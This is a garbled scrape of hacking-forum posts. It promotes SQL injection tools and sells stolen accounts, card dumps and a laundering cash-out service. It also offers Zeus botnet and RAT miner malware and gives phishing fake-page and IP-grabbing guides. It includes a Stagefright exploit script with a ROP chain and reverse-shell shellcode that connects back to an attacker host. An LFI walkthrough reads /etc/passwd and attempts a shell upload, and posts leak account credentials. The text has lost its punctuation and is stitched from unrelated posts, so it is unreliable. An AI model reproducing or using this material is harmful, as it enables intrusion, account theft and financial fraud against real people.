takes long time hack account specially. 
com wrote qrab wrote new priv mailer inbox. 
codefirethanks wrote these tools are specialised performing and even automating sql injection attacks websites. 
attach config attach table sql injection attack code injection attack that used exploit web applications and websites. 
one the most common methods for hackers get into your system. 
learning such attacks are important for anyone looking perform their own exploits. 
here are the most powerful tools that aid performing sql injection attacks. 
bsql hacker aims for experienced users well beginners who want automate sql injections especially blind sql injections. 
allows metasploit alike exploit repository share and update exploits. 
mole automatic sql injection exploitation tool. 
only providing vulnerable url and valid string the site can detect the injection and exploit either using the union technique boolean query based technique. 
the mole uses command based interface allowing the user indicate the action wants perform easily. 
the cli also provides auto completion both commands and command arguments making the user type less possible. 
pangolin penetration testing sql injection test tool for database security. 
its goal detect and take inform you sql injection web applications. 
sqlmap open source penetration testing tool that automates the process detecting and exploiting sql injection flaws and taking over database servers. 
comes with powerful detection engine many niche features for the ultimate penetration tester and broad range switches lasting from database fingerprinting over data fetching from the database accessing the underlying file system and executing commands the operating system via out band connections. 
havij automated sql injection tool that helps penetration testers find and exploit sql injection web page. 
using this software user can perform back end database fingerprinting retrieve dbms login names and password hashes dump tables and columns fetch data from the database execute sql statements against the server and even access the underlying file system and execute operating system shell commands. 
enema not auto hacking software for script kiddies. 
this dynamic tool for professional pentesters. 
sqlninja tool targeted exploit sql injection web application that uses microsoft sql server its back end. 
written using the perl programming language this open source penetration testing tool for mysql injection and takeover. 
safe one the most powerful and easy usage penetration tool that automates the process detecting and exploiting sql injection flaws and taking over database servers. 
comes with detection engine. 
this tool includes php asp rfi dorks that can used for penetration testing. 
nice information kinda interested. 
have few accounts various torrents sites thepiratebay extratorrent kickass etc available for sale. 
why buy these accounts. 
well these accounts are trusted vip ranked. 
hence people using these accounts don't get banned sooner. 
what can you use these accounts for. 
malware hack tools etc torrents via these accounts. 
what you with these accounts are you. 
well you wont find sellers selling vip trusted accounts these torrents sites. 
and our best source accounts for you. 
why are these accounts expensive. 
yes these are expensive its not easy become vip trusted takes years and lot effort come that rank. 
hence can only buy these accounts high price and sell with little profit for ourselves. 
can provide you accounts details before you buy. 
well can provide you rank details and sites the accounts will from. 
however cannot reveal account name till the time the payments are done. 
how you pay for these accounts. 
can accept bitcoin payments only. 
use the forum message feature post reply this post contact via skype. 
thank you much for share. 
paypal each lnk file exploit required information build the lnk exploit for you. 
direct download link downloads. 
you want run the downloaded thing virustotal unknown exploit researchers. 
contacts purchases via when you make purchase add these informations. 
your email can give link where you can get the lnk with exploit. 
paypal email paid with can confirm the purchase make sure you paid paypal email theplayer gmail. 
gonna have great time bro. 
nijidgreat wrote expir wrote hello would love have this tool thanks. 
thx bro for this. 
tutmoses wrote url vulnerable url vulnerable url vulnerable url ions gas vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url url vulnerable url url url. 
checkout here link removed staff thanks and just let this bot your side bots make much. 
privateloader wrote send sms and call pranks any number. 
real person will touch with the number you provide download url virustotal url. 
painkiller wrote free direct admin page finder php. 
exe priva version over path list guys here priv version the napsterakos admin page finder with new huge dork list and more options. 
many you may know the admin finder from this topic. 
the priv version there proxy and user agent options. 
also new admin path list that has over paths. 
the main source the php version isn't mine just modified bit and add new list all credits bitshack here the php version screenshot and here the. 
exe version screenshot you will need. 
url download url pass pvttool leave reply keep this thread alive you want. 
will try ruthy wrote tutorial hack anyone facebook email. 
word dope share thanks. 
thanks dude appreciate the work. 
painkiller wrote updated app alil added proxy support keep hidden not going lie very laggy lol but hey what expect have fun guys and happy hacking party. 
rar password vipunderground download url please give info. 
hope this works hahaha thanks man gonna try out thanks advance. 
user pass hxymnzu don't change the password the account not working. 
this the stagefright code with errors below. 
usr bin env python exploit for rce vulnerability cve integer overflow the libstagefright 'stsc' atom handling don't forget the output create can delivered many ways mms the most dangerous attack vector but not the only one. 
disclaimer this exploit for testing and educational purposes only. 
any other usage for this code not allowed. 
with great power comes great responsibility. 
uncle ben import struct import socket creates single atom len tag data def make chunk tag data len tag raise 'yo they call fourcc for reason. 
pack len data ret tag ret data return ret make 'stco' atom sample table chunk offets def make stco extra ret struct. 
pack version ret struct. 
pack return make chunk 'stco' ret extra make 'stsz' atom sample table size def make stsz extra ret struct. 
pack return make chunk 'stsz' ret extra make 'stts' atom sample table time sample def make stts ret struct. 
pack return make chunk 'stts' ret this creates single sample table sample chunk entry def make stsc entry start per desc ret ret struct. 
pack start ret struct. 
pack per ret struct. 
pack desc return ret make 'stsc' chunk sample table sample chunk the caller desires will attempt trigger cve and cause heap overflow. 
def make stsc num alloc num write addr overflow false ret struct. 
pack version flags this the clean version. 
not overflow ret struct. 
pack num alloc ret 'z' num alloc return make chunk 'stsc' ret now the explicit version. 
trigger the bug ret struct. 
pack num alloc fill the entries that will overflow the buffer for range num write ret make stsc entry addr addr addr ret make chunk 'stsc' ret patch the data size ret struct. 
pack num alloc ret return ret build the rop chain rop pivot georg wicherski thanks gdb restore core regs restore core regs add restore core regs ldm restore core regs push restore core regs ldm restore core regs ldm mprotect push mov svc pop movs bxpl raise def build rop off addr newpc val host port rop rop struct. 
linux armle shell reverse tcp modified pass env and fork exit buf fork buf buf xef' continue not parent. 
buf buf exit parent buf buf buf xef' setsid child buf buf xef' socket connect dup dup dup buf buf xef buf buf xef buf xef buf buf xef buf xef' execve shell argv env buf buf buf buf buf xef add the connect back host port buf struct. 
pack port host socket. 
inet aton host buf struct. 
pack host shell buf system bin argv buf 'sh env buf 'path sbin vendor bin system sbin system bin system xbin add some identifiable stuff just case something goes awry. 
rop start off rop start off len rop while len rop rop start off rop struct. 
rop buf return rop build that exploits cve mimic meow. 
def create addr newpc val host port chunks build the header. 
ftyp 'mp ftyp struct. 
pack ftyp 'mp ftyp 'isom' chunks. 
append make chunk 'ftyp' ftyp note this causes few allocations. 
moov data moov data make chunk 'mvhd' struct. 
pack ll' 'b' add minimal verified trak satisfy mlasttrack being set moov data make chunk 'trak' make chunk 'stbl' make stsc make stco make stsz make stts spray the heap using large chunk can contain binary data znk android refbase decstrongepkv ldr load mrefs znk android refbase decstrongepkv mov znk android refbase decstrongepkv mov znk android refbase decstrongepkv mov znk android refbase decstrongepkv blx atomic decrement znk android refbase decstrongepkv cmp must znk android refbase decstrongepkv bne. 
znk android refbase decstrongepkv znk android refbase decstrongepkv ldr load refs mbase znk android refbase decstrongepkv ldr load mbase. 
vptr znk android refbase decstrongepkv ldr load method address znk android refbase decstrongepkv mov znk android refbase decstrongepkv blx call page off the offset the next object off page struct. 
refbase for when smash mdatasource page struct. 
mrefs unused off page struct. 
pack make chunk 'ilst' make chunk 'cpil' make chunk 'data' struct. 
pack ll' 'a' make chunk 'trkn' make chunk 'data' struct. 
pack ll' make chunk 'disk' make chunk 'data' struct. 
pack ll' make chunk 'covr' make chunk 'data' struct. 
pack ll' block make chunk alb' make chunk 'data' struct. 
pack ll' block make chunk art' make chunk 'data' struct. 
pack ll' block make chunk make chunk 'data' struct. 
pack ll' block make chunk day' make chunk 'data' struct. 
pack ll' block make chunk nam' make chunk 'data' struct. 
pack ll' block make chunk wrt' make chunk 'data' struct. 
pack ll' block make chunk 'gnre' make chunk 'data' struct. 
pack ll' block make chunk 'covr' make chunk 'data' struct. 
pack ll' bigger make chunk wrt' make chunk 'data' struct. 
pack ll' bigger make chunk day' make chunk 'data' struct. 
pack ll' bigger moov data udta make the nasty trak tkhd. 
join version 'd' padding 'e' time duration 'f' struct. 
pack 'g' trak trak make chunk 'tkhd' tkhd mdhd. 
join version 'd' padding mdia mdia make chunk 'mdhd' mdhd mdia make chunk 'hdlr' 'f' dinf dinf make chunk 'dref' 'h' minf minf make chunk 'smhd' 'g' minf make chunk 'dinf' dinf build the nasty sample table trigger the vulnerability here. 
stbl make stsc addr true trigger add the stbl the minf chunk minf make chunk 'stbl' stbl add the minf the mdia chunk mdia make chunk 'minf' minf add the mdia the track trak make chunk 'mdia' mdia add the nasty track the moov data moov data make chunk 'trak' trak finalize the moov chunk moov make chunk 'moov' moov data chunks. 
append moov combine outer chunks together and voila. 
join chunks return data name main import sys import import argparse def write file path content with open path 'wb'. 
write content def addr sval sval. 
startswith return int sval return int sval the address fake strongpointer object sprayed addr takju imm via hangouts the address our rop pivot newpc val point restore core regs allow the user override parameters parser argparse. 
add argument connectback host' dest 'cbhost' default. 
add argument connectback port' dest 'cbport' type int default parser. 
add argument spray address' dest 'spray addr' type addr default none parser. 
add argument rop pivot' dest 'rop pivot' type addr default none parser. 
add argument output file' dest 'output file' default 'cve. 
parse args len sys. 
spray addr none args. 
spray addr addr args. 
rop pivot none args. 
rop pivot newpc val build the file. 
cbport print saving crafted. 
output file write file args. 
hello again guys offensive comunity after shared the cryptersoucre now time for botnet source all this botnet still source and most them make using and here link download. 
password for the rar. 
caddy the good and the oldest member day. 
what are the possible things can with those usd. 
this link leading hackademics. 
program chrome url host. 
thanks for btw i'm new here everyone. 
mcmanuel wrote can you teach more about need bro all doing including hex signatures suppose that are more than likely heuristic signatures the worldwide most cases fucking company will lock file block access normal user lost fucking wallet sounds dumb format and all this going fuck someone like having chance steal your wallet move can fuck shit and theres point learn something that useful offense either you. 
forum poster program that automatically post reply messages forums. 
forum poster automatically register user with the username mail and password you typed the board. 
login the registered user the board and then post reply. 
with just one click forum poster support add edit delete forums url import and export forum url list. 
forum boards are effective way drive traffic your site. 
with your posted ads you can bring hundreds new visitors your site and increase your search engine rankings which counts link popularity like google. 
features auto register login post reply message logout support image verification support skip image verification forum find open board post selectable forum boards post input board number field 'forumid' after login and post all 'host unreachable' 'connection with remote host lost' 'host unrechable' document not found' cgi script failed' 'anti bot' 'register error' 'account need active' forums save one text file and remove from database. 
you can view process debug window support proxy server support add delete edit forum url support import export forum list easy use just enter your texts and post support post multi topic one your messages can include links picture. 
etc use bbcode message please see forum help for more information your webpage traffic will raise alot what's bbcode increase your position search engines which counts the link popularity your site like google shutdown when jobs done support unicode and utf encode. 
support reply thread support different username and password for the message board url. 
com download koqlutp jfx forum poster. 
rar download forum poster url. 
data tampering also best way for changing extention runtime. 
network administrator uses sonic wall for content filtering. 
need open website like facebook need use some vpn proxy. 
but have found that enter. 
the following login page appears given the image. 
question possible hack the password using any technique like wireshark something. 
very interested knowing the techniques and new hacking. 
main aim not access blocked content. 
main aim hack into attach config attach. 
thank you very uch. 
need hacker teach few tricks microsoft remote access how make bug notifications error messages pop their without them knowing. 
willing pay front anyone interested helping out. 
the link does not work. 
here are three very quick and easy methods retrieve someones. 
obtaining from msn messenger. 
firstly learn the method used most people when they want get someone elses address. 
step start msn messenger and login yourself. 
step hit your start button and click run. 
type into the white box command without the quotation marks step type netstat without the quotation marks into the black box and hit enter. 
step start conversation with your 'victim' and send them file. 
once they accept the file hit your start button and click run. 
type into the white box command without the quotation marks and type netstat without the quotation marks into the black box and hit enter. 
step look the middle column both your dos boxes and look the newer wndow for the address that has magically appeared the middle column. 
this your victim's address. 
lets say the person does not use msn messenger can't blame them can get address from most mail address. 
this example shall use outlook express view the mails. 
step load outlok express and left click mail that was sent from your 'victim' step right click this mail and click the properties button. 
step now click the tab displaying it's text details and look for the buttom saying message source once found not hard click. 
step look all the jargon for something like originating with number after the colon. 
this number the sender's address. 
step you cannot find originating then not worry. 
look for instead received and along this string untill you come nuber brackets this however maybe but might not the address the 'victim' infact they sent the mail from mail service like hotmail. 
com then chances are not their address. 
obtaiing from physical access. 
you have physical access computer then getting the address simple. 
step click the start button and hit run. 
type command and hit enter. 
step type ipconfig winipcfg and hit enter now look for where says address next this the the computer you are using. 
please add reps you find this useful sunbathing. 
lets check out looking for gmail cracker also. 
code code thx for sharing. 
this hacker the one have been looking for. 
tried his dumps and worked. 
will like give him rep for his good works. 
hope every one can try him. 
ndering where this went. 
where it's the download link thank you. 
reply for content thanks for this. 
cheers mike lets see how works. 
net images smilies yay. 
need access private email server cuba fee negotiable must present proof access first. 
try resetting their password you might know their secret questions personal information. 
thanks for the thread. 
the link doesn't work. 
lets see can this time. 
thankks for sharing check now. 
thank reply for look the link feed later. 
upload new file download link hours otherwise i'll close this thread. 
enjoy first skip the add than enjoy those pass username need some cracked emails. 
user jackson wong hotmail. 
com pass don't change the password the account not working. 
didnt play with ircbots since ages. 
remember void but cant find for download any help with links please and whats the latest offensive some good bots for linux got debian server thanks lot. 
est girls koiktooted productid host. 
datazone unix mod zfpm. 
server mysql time based resp. 
time avg current user. 
loi current system user. 
host name ysql installation dir zone. 
does anyone have streamate cammodels account. 
know how hack crack one message. 
gracias amiwo mucvhas garcias. 
thank you should working fine. 
thanks man sounds interesting. 
very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like hide first you should have coinbase account. 
link this link here enter your coinbase mail click earn now enjoy and leave your thanks here hide hide note the earnings shud location specific. 
not tested yet but use vpn with for higher gains hide hide spoilerall have keep solving the captcha and let the ref number included. 
let the bitcoin keep piling hide enjoy. 
love very very good. 
hello all members this thread show you how make money internet using this site url. 
php ref fanslave url and you can change your creadits paypal payza first you register the site from here. 
php ref attach config attach you must have facebook acounte twitter better use them all attach config attach after registeration log you account and facebook twitter google youtube traffic you will find some advertising attach config attach just clicking sites you will get credits and after you reach euro you can transfer your payments your payza paypal going cashout attach config attach see you. 
thanks man good pass. 
after year being very successful with our private locker software are now releasing the public. 
will try thanks mate. 
darklogics wrote vyrus wrote all mail password cracker. 
rar password vipunderground download url much confidence will try swag. 
scripts new and distinctive private scripts pull konfiq worked abbreviation the root and display the domain and visit the site scripts forces the clouds explained. 
com watch sxu ouz the script data user boksha pass download. 
zimbra wrote hello without bla bla let's start hack you'r friend facebook for exemple there are many way's today i'll explain how withe easy way think wil use the powerful web site fake page register and get link fake page facebook any other service url creat you'r one fake link url also use all the fake page get vip membre url hope you like see thanks. 
tnx for sharing will take try tnx dude. 
the date one hope works. 
from nigeria and isp mtn. 
and using broadband modem connect the internet. 
but want make static because rats. 
nice post very useful. 
like this warning this the tutorial dns spoofing. 
would surely like check this one out. 
hope it's good can't wait troll friends. 
thanks man like please update the download link. 
need get password gmail account without the account getting locked. 
thanks for this nice thread. 
replying see the content. 
for watching the content. 
how crack program step step this tutorial taking the example keygenme. 
exe how crack first all download asm and hiew google them extract desktop then place keygenme. 
exe from hiew folder and put folder dasm desktop and then click keygenme. 
exe and enter any value will give error try again invalid key then click dsm. 
exe folder dasm and from dissambler select option 'open file disassembler' and select the keygenme exe file and will disassemble the code. 
after that click search option and that click 'find text' and find type your message say for this instance try again and click find next and will find the exact string. 
when find the string message and press cursor button and will find the specific conditinional unconditional referenced call address and find the address for this message and this case the address. 
after that desktop make another copy keygenme. 
exe copy paste and then move drag keygenme copy. 
exe and finally opens blue screen hiew hex editor. 
when the blue screen hiew hex editor opens and then click function key and select decode. 
now press and then ignore address and write. 
after that press and edit mode set values. 
till upto that upto after that save update and select truncate finally press and and done now close and open the keygenme copy. 
exe and enter any value and you get the message you crack and with this you have cracked the keygen. 
exe file done cool tut beowolf. 
want see thank you. 
would try this and see maybe works. 
snprzq wrote hello mates found this method contacting this guy this forum thought might share this. 
thanks dude for your kind. 
hello looking for someone that can access personal domain all need username and password. 
please someone has the tallent. 
you can download from here for free thanks bro this awsome. 
have copy latest zeus kins botnet that grabs firefox latest grabs chrome latest grabs latest grab pop outlook logins grabs ftp shell logins backconnect module vnc module anti rapport anti tracker for support contact yahoo exploitdeal yahoo. 
ill check out now. 
nickron wrote just sign here hidden content cannot quoted. 
and confirm your account receive usd. 
very good support very good support very good support very good support. 
need gmail account password just need look thing nothig else. 
expir wrote hello would love have this tool thanks. 
hii that's great give the sms bomber call bomber will really appreciate. 
sinfullgatsby wrote indian hacker member new this site and this first post today will tell you the easiest way perform phishing free fake pages. 
visit this link and register then get you own personal free fake pages url example site available facebook tweeter paypal skype etc. 
hope gonna work with the webinject. 
user ominae pass ominae don't change the password the account not working. 
i'm keen trying this. 
please give detailed instructions. 
cybdom wrote this modified the famous botnet zeus. 
thanks for sharing this let's test. 
hackers from ukraine are here help you buyers from those rippers and scammers the internet have hacking experience for over years advise all buyers work with thank you are you looking for easy make money and you want billionaire. 
then simply stay connected with started all stuff first deal low rates build trust with each other. 
have big experience western union transfer bank transfer paypal transfers. 
rates are fixed negotiationin terms prices. 
please never ask for test transfers etc. 
sell dumps fullz etc. 
don't ask for recent proofs because many scammers takes proofs from and then they scam you peoples showing proofs decided not share anymore proofs private chat. 
first all want clear one thing that dont work for percentage please dont waste time and yours too for asking partnership because happy with work and dont want lost time this kind proposals. 
contact email zimmer julius yahoo. 
com yahoo zimmer julius icq for western union transfer info needed first name last name city country email for confirmation western union transfering worldwide. 
you will get mtcn code sender info amount and then you can pickup from any store office. 
note only time transfer name week you need daily transfers then you must have use more names. 
western union transfer rates for transfer for transfer for transfer for transfer for transfer for transfer for transfer for transfer mtcn split code into parts rules for bank transfer for bank transfer you will provide your bank info and will transfer funds into your account within time limit promised. 
specially transferring from these countries bank transfer rates for transfer for transfer for transfer for transfer for transfer info needed for bank transfers bank name bank address zip code account holder account number account type routing number bank transfer will take maximum hour for money reflect your bank account. 
paypal transfer using hacked and verified paypal accounts transfer paypal account account transfer. 
doing paypal transfer safe accounts first and then into customers accounts you dont have any headache clean the money because its already clean when transfer into account. 
paypal transfer rates for transfer for transfer for transfer for transfer for transfer contact email zimmer julius yahoo. 
com yahoo zimmer julius icq need good person and also good customer deal with. 
want make you rich you will also make the same accept bitcoin and perfect money only. 
all mail password cracker. 
thanks fucker will the shit. 
and can someone confirm this. 
thanks but i've tried this already but can't get anything work. 
kinda new this but how you keep the information safe encryption. 
thanks for this sharing. 
adje hope this would work. 
cool please keep just hope work. 
need some people can trust job can say does pay well but you have work for and may difficult. 
need people who know how social engineering get small group people. 
pays very well not scam but need stay anonymous contact here mail anonymous. 
com for more information. 
thanks for sharing method. 
code php lfi fun tutmoses this tutorial going give you url show you how this works this how bypass openbase dir restriction etc does not always work but you get right its fun look and see example base encode file out php filter convert. 
base encode resource index. 
php top home url. 
php warning include function. 
include open basedir restriction effect. 
file etc passwd not within the allowed path home jthkrgfw tmp var tmp usr local lib php home jthkrgfw domains mistflard. 
php line warning include etc passwd function. 
include failed open stream operation not permitted home jthkrgfw domains mistflard. 
php line warning include function. 
etc passwd' for inclusion include path. 
usr local lib php' home jthkrgfw domains mistflard. 
php line url that triggered error. 
etc passwd now see what can here. 
php page php filter convert. 
base encoded response dpbj dfvfsnbg naw nxtskpz kpcfet nuwvbfigh mvl ftiigimh dha cudzmub jnl rsl hodg sms eveqvegh zaxrpb hbc kdgqipgo ahrtbcb bwxucz iahr cdovl vcmcvmtk ahrtbci cjxozwfkpgo bwv psjdb lvr hhcnnldd dgytociglz kpg ldgegig hbwugpsaidmlld lkdgg mtaynciglz rpamwuy nziibyzww inn ewxlc cgu inrlehqvy nziiavpgo lmielfidzdpia nziibyzww inn ewxlc cgu inrlehqvy nzij ivtlbmrpzl tlt ydgn dcbpy awnvbi iic cjx axrszt taxn zmxhcmq rpdgxlpgo nyaxb ihr cgu inrlehqvamf nyaxb pgo nyaxb igxhbmd nyaxb kznvuy rpb gcgfzc jlc bvbnnlkckgewp lbgvtzw gzg jdw lbnqubg naw udxnlcl bwvudc ozm ybs vzg jdw lbnquagzvcm ucgfzcy ywx bwvudc dpbi rlbxaudmfsdwu cmrvy vtzw lmxvz lulnbhc nfdgvtcc ywx zsa iciiowp ywnodde tuq khbhc mplnrvtg cnbhc cjw pgpidwzmpxdhy mss boccbly pjsgcndhy dlcknhc uoktskzg jdw lbnquagzvcm udxnlci ywx vszw lbnq cmrvy vtzw lmhmb jtlnbhc mjskzg jdw lbnquagzvcm kzs ywx boccbly pjskzg jdw lbnquagzvcm vibwl kck kpc jpchq cjwvagvhzd kpgjvzhk cjxkaxygawq haw ipgo zgl iglkpsjib mzci cjxkaxygawq imxvz luij kpd wahakawygkcrfu vtu udwxskqp cmlmicgkbg naw ptepigvjag gijxhighyzwy luzgv lnbocd zyc pgltzybzcmm ltywdlcy rbm wes nawynigfsdd ndwl jybzdhlszt nym yzgvyojanlz hvici waha cgfnzt pbi wahambg naw mscgpjxpbwcgc vchguz lmjybhbhq fhbicgc bgu jvcmrlcjowjy hpii cmlmicgkbg naw hptepcnskaw jbhvkzsaiy iowply hvici dgq vicnvpa vyc hyw dgq fjahr yzdo rkpjwvdhi jtigfjdglvbj nbg naw bvc qnpii cmvjag gijx wdxqgdhlwzt ndgv dccgbmftzt ndxnlcm ewxlpsd awr ado hlawdoddoxmnb zvbnqtc ztoxmxb iowply hvici dgq pgluchv ihr cgu bhc jkjybuyw yzccgdmfsdwu jycgc bgu dpzhroojg chg agvpz ojeychg udc iowply hvici dgq pgluchv ihr cgu kzscgdmfsdwu dcb hbwu pdej xvz lujybjbgfzcz vcdenlz rkpii cmvjag gijwvzm ybt gbmftzt ibg naw ipic cmvjag ywjszt dhi phrkpmdlynj phrkpndhy vcmq rypic cmvjag gijx wdxqgdhlwzt ndgv dccgbmftzt ndxnlcl wjyb ywx njybzdhlszt lkdgg mtjwedtmb lxnpemu mtfweccglz rkpii cmvjag gijx wdxqgdhlwzt ncgfzc dvcmqnig hbwu bhc jycgc bgu dpzhroojg chg agvpz ojeychg udc iowply hvicc dgq pgluchv xpy inbhc gzmfsc iib hbwu inn pdgj biigdmfsdwu ikxvz wmii nowply hvicc zvcm gywn upsjsb dpbnzlawxpzy wahaiie fvehprd iue tvcigbmftzt iagzvcm ipic cmvjag dcb exblpsjoawrkzw iig hbwu cmvjag dcb exblpsjoawrkzw iig hbwu inbhc jkij nowply hvicc wdxqgdhlwzt lpsjjb rlij nowply hvicc zvcm jzskfqp igvsc ukewply hvici naw vzl tub lmdpzicgywx pscnihn ewxlpsdib mccvpjwvyt iowokdxnlcj nfu njt dgqgc bgu dpzhroojiymhb nzc rkpjwvdhi ybsbhy rpb xvz vpdc wahanig ldghvzd ncg zdcc pgluchv ihr cgu pdccgbmftzt wmscgdgl bgu vpdgxvz dlbicvpii cmvjag gijwvzm ybt rkpii icagly opgegahjlzj ibg ndwl lnbocci ndwl hpikkiap cmlmicgojf trvntsu owyd vyj bgwpicymicgkbg naw hptepkqp cmvjag gijxmb jtigfjdglvbj naw bhz cghwl zvcnvtl lbgrhyw bvc qnpii cmvjag gijx wdxqgdhlwzt vibwl jybuyw xhc tub ayjy ijskzwnobyaipc zvcm gywn upsdpbmrlec waha cgfnzt wahavzm ydw vdmvyz bvc qnpii cmvjag gijx wdxqgdhlwzt vibwl jybuyw lpsdzdwiyjyb ywx npycgy xhc tub awjyb axrszt fjahr yzcb nlz iowply hvici rkpjwvzm ybt iowp igvsc ugawygkcrsb dpbie mskkewply hvici ybsbhy rpb luzgv lnbocd wywdlpxbocc hyawpmdwl kpsdwb ioybly hvijx zcbzdhlszt lkdgg mti chgnpjwvdgq dcb hbwu pdej xhc tub ayjy ihr cgu ndxnlcm hyw iowply hvici rkpjwvzm ybt iowogawygkcr vypt nywrtaw gywn upsdpbmrlec waha cgfnzt wahavzm ydw vaw zdgvsbgluz kpsdwb dcb hbwu ynn lulicgy xhc tub awjyb axrszt nsw zdgvsbgluz vujy ijskigvjag gijwvdgq jtpii cib ciakfsbly hvici rypjwvdgfibgu kaxy ijsgly gzwluzgugbg naw kjhzvcm xpscnoyr jtmj njzskdm ybtm jyc jhzvcm pscnoyr jtnt njzskdm ybty jyc cmlmichpc nldcgkx gjf hrvrbj bhz imlubgvpzgluzy ybte jsb sno pbi wahaikxskdm ybte jsb sno psjob jhzvcm ypsdibg rjzt igvsc idg jtmz nymxvayc ybtq jsb sno udgfjdc wahaiksb fcaojhbhz psjlzm ybs wahaiksb fcaojhbhz jtnt nymxvayc fsblbhnlihskdm ybti jsb snoyb cjwvzgl pia tzwluzgugsg vzmqtlt ibwvudsi cia zgl zlcm boccbly hvicr jtmtsgpz ipjxhighyzwy imluzgv lnbocd bhbj sat kidxsasbpzd ipd ybti waha cgfnzt llnboccigdgl bgu ikzvcnvtij bhbj btwvc bhbj sat kidxsasbpzd ipd ybtm waha cgfnzt vsawnodgluzy npc zcgfupjwvyt boccbly hvicr jtndsgpz ipjxhighyzwy imluzgv lnbocd bgu phnwyw ydw zcgfupjwvyt boccbly hvicr jtntsgpz ipjxhighyzwy imluzgv lnbocd wywdlpwnvbnrhy qucghwiib axrszt iij bhbj ywn zcgfupjwvyt xppgogpc kpc kaxy cjwvzgl pgo zgl tihzvb igsuugniatlt rpdj kpd wahakawygkglzc kcrfr vuwydwywdlj pkqogicagjhbhz ugpsakx wahaioyakpz kpd wahakzwnobyi zgl iglkpsddb iaw szwlkaw nywrtaw vtu udwxskskgjhbhz imlubgvpzgluzy kaxy ijsglyplaw kzsbjb icovcj cjxkaxygawq jyk cmvjag gijxkaxygc bgu hcmdpbi szwz ojywmhb hcmdpbi mtbwedsnpiiuj bhz luysbnzw wzw pic cjwvzgl pgo rpdj haw tlt jpchqgdhlwzt idgv nyaxb kdmfyigdhsnnib gkcgiahr chm iia psbkb bwvudc nhdglvbi wcm nvbckgpyaiahr chm wuiia icjodhrwoi liipowpkb bwvudc cml zsh bmvzy fwzsgijtndc nyaxb niiarigdhsnnib icsgimdvb dszs hbmfsexrpy muy dhlmpzjyb exblpsd phdmfzy jpchq jpchqgdhlwzt idgv nyaxb kdhj ewp vykcjvqs xnzuwoda xiik cnbhz vucmfja vyll cmfja bhz awv kck fqo njcmlwdd kcjwvym ket kpc odg decoded response. 
php login get 'login'. 
org xhtml dtd xhtml transitional. 
css rel stylesheet type text css. 
value pass user element document. 
tolowercase pass buff wacht wacht buff. 
value user element document. 
php login title 'ga terug'. 
gif' alt 'uit' style 'border else echo. 
gif' alt style 'border login include controle. 
php echo echo wachtwoord echo. 
php' method 'post' echo echo echo echo echo else echo echo wachtwoord echo echo echo echo echo. 
php method post name hform echo echo echo echo else echo. 
gif' alt style 'border user session 'user' echo user ingelogd. 
php' method 'post' echo. 
php loguit session 'user' null login echo. 
php page php forum. 
php' method 'post' echo echo echo. 
php page php forum vergeten. 
php' method 'post' echo echo else login echo. 
php page php forum schrijfuit. 
php' method 'post' echo echo echo echo user 'admin' echo. 
php page php forum instellingen. 
class 'knop title 'instellingen' echo echo einde login vorm vorm vorm vorm vorm vorm isset get 'page' page get 'page' else page inleiding. 
php vorm 'blok' else page inleidingadmin. 
php vorm 'blok' else page home. 
php vorm 'blok' else page toelichting. 
php vorm 'blok' else page forumregels. 
php vorm 'blok' else page contact. 
php vorm 'blok' else vorm 'blok'. 
php title inleiding inleiding. 
php title forum forum. 
php title forum regels. 
php session 'user' null page inleiding. 
php include page echo einde content. 
'pagina geopend strftime mktime. 
write unescape cscript src gajshost google analytics. 
js' type 'text javascript' script. 
now move see can root the box atleast get shell uploaded now they have open base dir restriction effect highly doubt can upload shell via proc self environ but can try hold. 
nah didnt thnk lets try this. 
php and decode its contents well using opionated geeks base decoder online and get the following prepend. 
php require once php login versio. 
php function check mydb new mydb sql select from blokkeer where ip' result mydb doquery sql mysql num rows result return true else date line mydb fetch result datum line reden line setlocale time 'nl nl' 'nl' 'du' refa strpos datum refa strripos datum substr datum refa daga substr datum refa substr datum refa dat strftime mktime daga datum echo toegang tot deze functie ontzegd adres geblokkeerd tot. 
dat reden reden null echo wegens. 
reden echo 'keer terug begin pagina. 
php method post echo echo return false else return true function check mail user mydb new mydb sql select veri from webuser where username user' result mydb doquery sql line mydb fetch result line return true else return false function check auth user user authorization nieuwe functie met extra controles false mydb new mydb sql select sessionid from webuser where username user' echo sql result mydb doquery sql mysql num rows result line mydb fetch result sessionid line line ipref server 'remote addr' len strlen session 'session id' false sessieid voldoet niet sessionid session 'session id' len true else echo geen toegang sessionid klopt niet. 
return false ipref true else echo geen toegang inlog adres verschilt van huidig adres. 
return false username voldoet niet else echo geen toegang log eerst. 
return false username voldoet niet user query select from where username. 
result mydb doquery query mysql num rows result return true else echo bent niet geautoriseerd deze pagina openen. 
return false autorisatie voldoet niet else return false geen usename function check auth user user authorization nieuwe functie met extra controles zelfde functie als dan zonder tekstmelding false mydb new mydb sql select sessionid from webuser where username user' echo sql result mydb doquery sql mysql num rows result line mydb fetch result sessionid line line ipref server 'remote addr' len strlen session 'session id' false sessionid session 'session id' len true else return false sessieid voldoet niet ipref true else return false voldoet niet else return false username voldoet niet user query select from where username. 
result mydb doquery query mysql num rows result return true else return false autorisatie voldoet niet else return false geen usename function check auth user user session authorization functie voor aparte controle verloop sessie toch nog geldige submit kunnen doen. 
false mydb new mydb sql select sessionid from webuser where username user' echo sql result mydb doquery sql mysql num rows result line mydb fetch result sessionid line line ipref server 'remote addr' len strlen session false sessionid session len true echo check auth user succesvol uitgevoerd else return false sessieid voldoet niet ipref true else return false voldoet niet else return false username voldoet niet user query select from where username. 
result mydb doquery query mysql num rows result return true else return false autorisatie voldoet niet else return false geen usename. 
fuck that wasnt eas but here guys these assholes are smart sort login info and top off they block access from outside the mysql server what are anybody with any ideas nrpe may running nagios want give shot they hadnt blocked acces their server would have owned them but you get the example. 
here are some tips first start knowing which type cms been used the site. 
after you have fingerprint the site look for public exploits. 
you are unable detect the cms after the server. 
did check the site and the server microsoft iis. 
there are public exploits for that system. 
use this tool research for exploits. 
thanks for share this. 
use dns spoofing hack your router. 
ussef hesham wrote rafiqctg wrote today here with bumper collection. 
enjoy first skip the add than enjoy those pass username hope this time work. 
nice job and thanks bro. 
the downloading link not work. 
ery easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like. 
wll try thank you. 
with any ddos requests and i'll make them happen. 
it's holiday and want return this community once again. 
com xpq bwm tumblr. 
priv imminent monitor the fastest rat miner reverse proxy imminent monitor added new feature. 
this new feature being the crypto miner. 
this can used force your bots mine bitcoin litecoin and many other online currencies. 
this feature awesome because now you longer have make buy silent miner. 
crack amiros download here. 
